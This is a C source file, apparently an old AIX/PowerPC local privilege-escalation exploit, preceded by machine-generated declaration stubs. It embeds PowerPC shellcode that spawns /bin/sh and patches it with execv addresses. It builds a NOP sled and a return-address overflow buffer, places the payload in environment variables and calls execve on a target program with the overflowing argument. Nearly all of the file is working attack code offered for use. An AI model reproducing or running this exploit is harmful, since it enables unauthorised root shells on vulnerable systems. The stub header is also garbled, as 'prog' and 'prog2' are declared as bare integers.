
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int MAXBUF ;
 int OO ;
 int atoi (char*) ;
 char* createvar (char*,char*) ;
 int execv ;
 int execve (int ,char**,char**) ;
 int exit (int) ;
 int fflush (int ) ;
 char* getenv (char*) ;
 int perror (char*) ;
 int prog ;
 char* prog2 ;
 int puts (char*) ;
 int stdout ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;

main(int argc,char **argv,char **env)
{

unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
unsigned int buf[600];
unsigned int frame[600];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int ch;
unsigned int reta;
int corr=1000;
char *args[4];
char *arg1="-ms";
char *newenv[8];
int startwith=0;

mn=200;
max=300;

if (argc>1)
        corr = atoi(argv[1]);

pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;

if ( ((mn+strlen((char*)&code)/4)>max) || (max>600) )
{
        perror("Bad parameters");
        exit(1);
}


*((unsigned short *)code + 7 + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + 7)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + 7 + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + 7 + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);

reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;

for(nop=0;nop<mn;nop++)
 buf[nop]=startwith ? reta : 0x4ffffb82;
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;

if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
        || !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}

while(i++<max)
 buf[i]=reta;
buf[i]=0;

for(i=0;i<max-1;i++)
 frame[i]=reta;
frame[i]=0;

if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};


newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);


newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=((void*)0);

args[0]=prog2;
args[1]=arg1;
args[2]=(char*)&frame[0];
puts("Start...");
execve(prog,args,newenv);
perror("Error executing execve \n");





}
